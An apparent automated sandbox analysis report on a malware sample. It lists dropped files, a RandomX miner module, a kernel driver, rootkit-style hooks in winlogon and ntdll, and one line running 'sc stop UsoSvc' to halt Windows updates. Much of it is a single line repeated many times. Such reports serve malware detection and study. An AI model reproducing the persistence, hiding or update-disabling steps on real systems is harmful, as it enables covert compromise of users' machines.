Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe | Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex
Source: C:\Windows\System32\wbem\WMIADAP.exe | Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Flag
Source: C:\Windows\System32\wbem\WMIADAP.exe | Mutant created: \BaseNamedObjects\Global\ADAP_WMI_ENTRY
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3572:120:WilError_01
Source: C:\Windows\System32\wbem\WMIADAP.exe | Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Lib
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5952:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3952:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:496:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7004:120:WilError_01
Source: C:\Windows\System32\dialer.exe | Code function: 11_2_00007FF7D2FD2328 VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,FindResourceA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,
Source: C:\Windows\System32\wbem\WMIADAP.exe | File written: C:\Windows\System32\wbem\Performance\WmiApRpl_new.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: file.exe | Static PE information: Image base 0x140000000 > 0x60000000
Source: file.exe | Static file information: File size 10264640 > 1048576
Source: file.exe | Static PE information: Raw size of .data is bigger than: 0x100000 < 0x9a2800
Source: file.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Source: C:\Windows\System32\winlogon.exe | Code function: 14_2_00000268A5A622B8 push rdx; retf
Source: C:\Windows\System32\winlogon.exe | Code function: 14_2_00000268A5A684FD push rcx; retf 003Fh
Source: C:\Windows\System32\winlogon.exe | Code function: 14_2_00000268A5BC94FD push rcx; retf 003Fh
Source: C:\Windows\System32\winlogon.exe | Code function: 14_2_00000268A5BC3130 push rax; ret
Source: C:\Windows\System32\winlogon.exe | Code function: 14_2_00000268A5BF22B8 push rdx; retf
Source: C:\Windows\System32\winlogon.exe | Code function: 14_2_00000268A5BF84FD push rcx; retf 003Fh
Source: C:\Windows\System32\winlogon.exe | Code function: 14_2_00000268A5C23130 push rax; ret
Source: C:\Windows\System32\winlogon.exe | Code function: 14_2_00000268A5C294FD push rcx; retf 003Fh
Source: C:\Windows\System32\lsass.exe | Code function: 15_2_000001F89C0184FD push rcx; retf 003Fh
Source: C:\Windows\System32\lsass.exe | Code function: 15_2_000001F89C0122B8 push rdx; retf
Source: C:\Windows\System32\lsass.exe | Code function: 15_2_000001F89C0494FD push rcx; retf 003Fh
Source: C:\Windows\System32\lsass.exe | Code function: 15_2_000001F89C043130 push rax; ret
Source: file.exe | Static PE information: section name: .xdata
Source: dxpserver.exe.0.dr | Static PE information: section name: .xdata
Source: bjmgommvilsr.tmp.0.dr | Static PE information: section name: _RANDOMX
Source: bjmgommvilsr.tmp.0.dr | Static PE information: section name: _TEXT_CN
Source: bjmgommvilsr.tmp.0.dr | Static PE information: section name: _TEXT_CN
Source: bjmgommvilsr.tmp.0.dr | Static PE information: section name: _RDATA
Source: file.exe | Static PE information: real checksum: 0x9cc924 should be: 0x9d033f
Source: bjmgommvilsr.tmp.0.dr | Static PE information: real checksum: 0x0 should be: 0x554c2a
Source: dxpserver.exe.0.dr | Static PE information: real checksum: 0x9cc924 should be: 0x9d033f

                        Persistence and Installation Behavior

Source: Yara match | File source: 00000017.00000003.708438407.000001FDE600F000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000003.585943996.000001FDE600F000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.772856939.000001FDE6010000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000000.562936177.000001FDE5F5F000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.770922577.000001FDE5F5F000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000003.679943242.000001FDE600F000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000003.650224694.000001FDE600F000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe | File created: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sys
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmp
Source: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe | File created: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sys

                        Boot Survival

Source: Yara match | File source: 00000017.00000003.708438407.000001FDE600F000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000003.585943996.000001FDE600F000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.772856939.000001FDE6010000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000000.562936177.000001FDE5F5F000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.770922577.000001FDE5F5F000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000003.679943242.000001FDE600F000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000003.650224694.000001FDE600F000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\lsass.exe | Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\SecureTimeLimits
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop UsoSvc

                        Hooking and other Techniques for Hiding and Protection

Source: winlogon.exe | IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
Source: winlogon.exe | IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
Source: winlogon.exe | User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x93 0x33 0x35 0x5D 0xDF
Source: C:\Users\user\Desktop\file.exe | Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\BJMGOMMVILSR.TMP
Source: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe | Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\BJMGOMMVILSR.TMP
Source: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe | Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\BJMGOMMVILSR.TMP
Source: winlogon.exe | IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
